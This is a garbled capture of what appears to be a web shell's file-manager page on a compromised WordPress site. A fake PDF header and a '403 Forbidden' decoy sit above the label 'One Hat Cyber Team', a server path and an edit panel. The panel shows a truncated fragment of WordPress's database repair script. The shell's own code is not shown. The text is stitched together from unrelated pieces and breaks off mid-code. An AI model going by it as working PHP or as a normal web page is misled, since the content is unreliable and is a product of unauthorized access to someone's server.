%PDF-1.4 %âãÏÓ 191 0 obj <> endobj 403 Forbidden
One Hat Cyber Team
  • Dir : ~/home/mshshams/demo.mbpjob.com/wp-admin/maint/
  • Edit File: repair.php

    '; } else { echo '

    ' . __( 'Repairs complete. Please remove the following line from wp-config.php to prevent this page from being used by unauthorized users.' ) . "

    define('WP_ALLOW_REPAIR', true);

    "; } } else { echo '

    ' . /* translators: Hidden accessibility text. */ __( 'WordPress database repair' ) . '

    '; if ( isset( $_GET['referrer'] ) && 'is_blog_installed' === $_GET['referrer'] ) { echo '

    ' . __( 'One or more database tables are unavailable. To allow WordPress to attempt to repair these tables, press the “Repair Database” button. Repairing can take a while, so please be patient.' ) . '

    '; } else { echo '

    ' . __( 'WordPress can automatically look for some common database problems and repair them. Repairing can take a while, so please be patient.' ) . '

    '; } ?>